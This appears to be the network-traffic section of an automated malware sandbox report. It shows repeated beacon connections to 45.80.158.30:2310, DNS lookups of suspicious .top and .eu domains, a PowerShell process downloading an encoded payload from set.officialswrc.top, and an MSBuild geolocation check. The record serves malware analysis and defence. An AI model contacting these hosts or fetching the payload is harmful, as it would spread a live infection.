                                                                                              Dec 19, 2024 13:20:52.537714958 CET4988923101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:52.538718939 CET4989523101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:52.657865047 CET231014988945.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:52.658478975 CET231014989545.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:52.658548117 CET4989523101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:52.662461996 CET4989523101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:52.782345057 CET231014989545.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:02.774123907 CET231014989545.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:02.774190903 CET4989523101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:02.774271011 CET4989523101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:02.775204897 CET4991623101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:02.895054102 CET231014989545.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:02.895947933 CET231014991645.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:02.896049023 CET4991623101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:02.899703026 CET4991623101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:03.019295931 CET231014991645.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:03.984776974 CET231014991645.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:03.984842062 CET4991623101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:03.984903097 CET4991623101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:03.985737085 CET4992223101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:04.104773998 CET231014991645.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:04.105386019 CET231014992245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:04.105477095 CET4992223101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:04.109949112 CET4992223101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:04.229516029 CET231014992245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:05.191378117 CET231014992245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:05.191447973 CET4992223101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:05.191536903 CET4992223101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:05.311218023 CET231014992245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:06.200732946 CET4992823101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:06.320666075 CET231014992845.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:06.320878029 CET4992823101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:06.329422951 CET4992823101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:06.449286938 CET231014992845.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:07.411606073 CET231014992845.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:07.414460897 CET4992823101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:07.430666924 CET4992823101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:07.445218086 CET4993223101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:07.550539970 CET231014992845.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:07.565248966 CET231014993245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:07.566363096 CET4993223101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:07.674639940 CET4993223101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:07.794739008 CET231014993245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:08.656086922 CET231014993245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:08.656167030 CET4993223101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:08.656261921 CET4993223101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:08.657206059 CET4993523101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:08.775935888 CET231014993245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:08.776973009 CET231014993545.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:08.777096987 CET4993523101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:08.782582998 CET4993523101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:08.902281046 CET231014993545.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:09.864093065 CET231014993545.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:09.866354942 CET4993523101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:09.866430998 CET4993523101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:09.867541075 CET4994023101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:09.986773968 CET231014993545.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:09.987790108 CET231014994045.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:09.990473986 CET4994023101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:09.994981050 CET4994023101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:10.114598989 CET231014994045.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:11.081955910 CET231014994045.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:11.082137108 CET4994023101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:11.082228899 CET4994023101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:11.201787949 CET231014994045.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:12.091445923 CET4994623101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:12.211076021 CET231014994645.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:12.213947058 CET4994623101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:12.217937946 CET4994623101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:12.337445974 CET231014994645.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:13.373393059 CET231014994645.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:13.373486042 CET4994623101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:13.373573065 CET4994623101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:13.374305010 CET4994823101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:13.493249893 CET231014994645.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:13.493896008 CET231014994845.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:13.493992090 CET4994823101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:13.499732971 CET4994823101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:13.619842052 CET231014994845.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:14.583492041 CET231014994845.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:14.586422920 CET4994823101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:14.586422920 CET4994823101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:14.586952925 CET4995423101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:14.706175089 CET231014994845.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:14.706587076 CET231014995445.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:14.708473921 CET4995423101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:14.711678982 CET4995423101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:14.831398964 CET231014995445.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:15.803456068 CET231014995445.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:15.803524971 CET4995423101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:15.803590059 CET4995423101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:15.804265976 CET4995523101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:15.923258066 CET231014995445.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:15.923830986 CET231014995545.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:15.923924923 CET4995523101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:15.927165031 CET4995523101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:16.046744108 CET231014995545.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:17.013676882 CET231014995545.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:17.013747931 CET4995523101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:17.013814926 CET4995523101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:17.133697987 CET231014995545.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:18.028341055 CET4996123101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:18.147912979 CET231014996145.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:18.150477886 CET4996123101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:18.153600931 CET4996123101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:18.273154020 CET231014996145.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:19.241079092 CET231014996145.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:19.241202116 CET4996123101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:19.241202116 CET4996123101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:19.242248058 CET4996723101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:19.361474037 CET231014996145.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:19.362179041 CET231014996745.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:19.362472057 CET4996723101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:19.365695000 CET4996723101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:19.486136913 CET231014996745.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:20.453301907 CET231014996745.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:20.453367949 CET4996723101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:20.453423977 CET4996723101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:20.454159021 CET4997023101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:20.573254108 CET231014996745.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:20.574029922 CET231014997045.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:20.574239969 CET4997023101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:20.578008890 CET4997023101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:20.697571993 CET231014997045.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:21.686932087 CET231014997045.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:21.687016964 CET4997023101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:21.687098026 CET4997023101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:21.687634945 CET4997423101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:21.806667089 CET231014997045.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:21.807157993 CET231014997445.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:21.807225943 CET4997423101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:21.811054945 CET4997423101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:21.930650949 CET231014997445.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:22.901122093 CET231014997445.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:22.901212931 CET4997423101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:22.901279926 CET4997423101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:23.020941019 CET231014997445.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:23.903248072 CET4998023101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:24.023237944 CET231014998045.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:24.026341915 CET4998023101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:24.029558897 CET4998023101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:24.149349928 CET231014998045.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:25.118592978 CET231014998045.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:25.118678093 CET4998023101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:25.118716955 CET4998023101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:25.119388103 CET4998423101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:25.238616943 CET231014998045.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:25.239378929 CET231014998445.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:25.239624977 CET4998423101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:25.242881060 CET4998423101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:25.362802982 CET231014998445.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:26.329377890 CET231014998445.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:26.330476999 CET4998423101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:26.330476999 CET4998423101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:26.330960035 CET4998723101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:26.450328112 CET231014998445.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:26.450453043 CET231014998745.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:26.450547934 CET4998723101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:26.453804970 CET4998723101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:26.573420048 CET231014998745.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:27.537420034 CET231014998745.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:27.537482023 CET4998723101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:27.537540913 CET4998723101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:27.538269043 CET4999323101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:27.657646894 CET231014998745.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:27.658174992 CET231014999345.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:27.658236027 CET4999323101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:27.661488056 CET4999323101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:27.781167030 CET231014999345.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:28.744313955 CET231014999345.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:28.748786926 CET4999323101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:28.748986959 CET4999323101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:28.931830883 CET231014999345.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:29.762911081 CET4999923101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:29.882898092 CET231014999945.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:29.884460926 CET4999923101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:29.888010025 CET4999923101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:30.007875919 CET231014999945.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:30.973737955 CET231014999945.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:30.973972082 CET4999923101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:30.973973036 CET4999923101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:30.974508047 CET5000023101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:31.096887112 CET231014999945.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:31.096990108 CET231015000045.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:31.097079992 CET5000023101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:31.100408077 CET5000023101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:31.222940922 CET231015000045.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:32.189651966 CET231015000045.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:32.189713955 CET5000023101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:32.189786911 CET5000023101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:32.190601110 CET5000623101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:32.309492111 CET231015000045.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:32.310240984 CET231015000645.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:32.310327053 CET5000623101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:32.313668966 CET5000623101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:32.433341026 CET231015000645.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:33.400932074 CET231015000645.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:33.401127100 CET5000623101192.168.2.445.80.158.30
                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Dec 19, 2024 13:19:07.254606962 CET6137853192.168.2.41.1.1.1
                                                                                              Dec 19, 2024 13:19:30.537457943 CET5874853192.168.2.41.1.1.1
                                                                                              Dec 19, 2024 13:19:31.051764011 CET53587481.1.1.1192.168.2.4
                                                                                              Dec 19, 2024 13:19:34.573563099 CET6456453192.168.2.41.1.1.1
                                                                                              Dec 19, 2024 13:19:34.895673037 CET53645641.1.1.1192.168.2.4
                                                                                              Dec 19, 2024 13:19:37.401786089 CET5908353192.168.2.41.1.1.1
                                                                                              Dec 19, 2024 13:19:37.539182901 CET53590831.1.1.1192.168.2.4
                                                                                              Dec 19, 2024 13:20:09.877115965 CET5429453192.168.2.41.1.1.1
                                                                                              Dec 19, 2024 13:20:10.418816090 CET53542941.1.1.1192.168.2.4
                                                                                              Dec 19, 2024 13:20:11.630475044 CET5472253192.168.2.41.1.1.1
                                                                                              Dec 19, 2024 13:20:12.055710077 CET53547221.1.1.1192.168.2.4
                                                                                              Dec 19, 2024 13:20:13.270828009 CET6099653192.168.2.41.1.1.1
                                                                                              Dec 19, 2024 13:20:13.799448967 CET53609961.1.1.1192.168.2.4
                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                              Dec 19, 2024 13:19:07.254606962 CET192.168.2.41.1.1.10xe7a3Standard query (0)res.cloudinary.comA (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 13:19:30.537457943 CET192.168.2.41.1.1.10xd641Standard query (0)set.officialswrc.topA (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 13:19:34.573563099 CET192.168.2.41.1.1.10xcf69Standard query (0)rem.pushswroller.euA (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 13:19:37.401786089 CET192.168.2.41.1.1.10xe542Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 13:20:09.877115965 CET192.168.2.41.1.1.10x9b2cStandard query (0)firewarzone.ydns.euA (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 13:20:11.630475044 CET192.168.2.41.1.1.10xc7eStandard query (0)dim.remofficialws.topA (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 13:20:13.270828009 CET192.168.2.41.1.1.10x156fStandard query (0)rem.officialswvrem.topA (IP address)IN (0x0001)false
                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                              Dec 19, 2024 13:19:07.393280983 CET1.1.1.1192.168.2.40xe7a3No error (0)res.cloudinary.comresc.cloudinary.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                              Dec 19, 2024 13:19:22.475964069 CET1.1.1.1192.168.2.40xb933No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 13:19:22.475964069 CET1.1.1.1192.168.2.40xb933No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 13:19:26.423935890 CET1.1.1.1192.168.2.40xb40dNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                              Dec 19, 2024 13:19:26.423935890 CET1.1.1.1192.168.2.40xb40dNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 13:19:31.051764011 CET1.1.1.1192.168.2.40xd641No error (0)set.officialswrc.top5.182.211.158A (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 13:19:34.895673037 CET1.1.1.1192.168.2.40xcf69No error (0)rem.pushswroller.eu45.80.158.30A (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 13:19:37.539182901 CET1.1.1.1192.168.2.40xe542No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 13:19:59.181997061 CET1.1.1.1192.168.2.40x3aafNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                              Dec 19, 2024 13:19:59.181997061 CET1.1.1.1192.168.2.40x3aafNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 13:20:10.418816090 CET1.1.1.1192.168.2.40x9b2cNo error (0)firewarzone.ydns.eu45.80.158.30A (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 13:20:12.055710077 CET1.1.1.1192.168.2.40xc7eNo error (0)dim.remofficialws.top45.80.158.30A (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 13:20:13.799448967 CET1.1.1.1192.168.2.40x156fNo error (0)rem.officialswvrem.top45.80.158.30A (IP address)IN (0x0001)false
                                                                                              • set.officialswrc.top
                                                                                              • geoplugin.net
                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              0192.168.2.449740178.237.33.50808048C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 19, 2024 13:19:37.663444042 CET71OUTGET /json.gp HTTP/1.1
                                                                                              Host: geoplugin.net
                                                                                              Cache-Control: no-cache
                                                                                              Dec 19, 2024 13:19:38.920955896 CET1171INHTTP/1.1 200 OK
                                                                                              date: Thu, 19 Dec 2024 12:19:38 GMT
                                                                                              server: Apache
                                                                                              content-length: 963
                                                                                              content-type: application/json; charset=utf-8
                                                                                              cache-control: public, max-age=300
                                                                                              access-control-allow-origin: *
                                                                                              Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED]
                                                                                              Data Ascii: { "geoplugin_request":"8.46.123.189", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7503", "geoplugin_longitude":"-74.0014", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              0192.168.2.4497375.182.211.1584437320C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-19 12:19:32 UTC81OUTGET /ink/gre.txt HTTP/1.1
                                                                                              Host: set.officialswrc.top
                                                                                              Connection: Keep-Alive
                                                                                              2024-12-19 12:19:33 UTC424INHTTP/1.1 200 OK
                                                                                              etag: "a0800-676328f6-13f694;;;"
                                                                                              last-modified: Wed, 18 Dec 2024 19:56:38 GMT
                                                                                              content-type: text/plain
                                                                                              content-length: 657408
                                                                                              accept-ranges: bytes
                                                                                              date: Thu, 19 Dec 2024 12:19:32 GMT
                                                                                              server: LiteSpeed
                                                                                              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                              connection: close
                                                                                              2024-12-19 12:19:33 UTC16384INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 2b 38 67 4e 50 38 79 44 6e 38 77 48 50 59 78 44 54 38 77 43 50 41 73 44 35 37 51 38 4f 6b 75 44 67 37 41 32 4f 38 73 44 48 36 41 76 4f 4d 72 44 72 36 77 6f 4f 73 70 44 52 36 67 69 4f 51 6f 44 43 36 51 67 4f 41 6b 44 2f 35 67 66 4f 30 6e 44
                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwD+8gNP8yDn8wHPYxDT8wCPAsD57Q8OkuDg7A2O8sDH6AvOMrDr6woOspDR6giOQoDC6QgOAkD/5gfO0nD
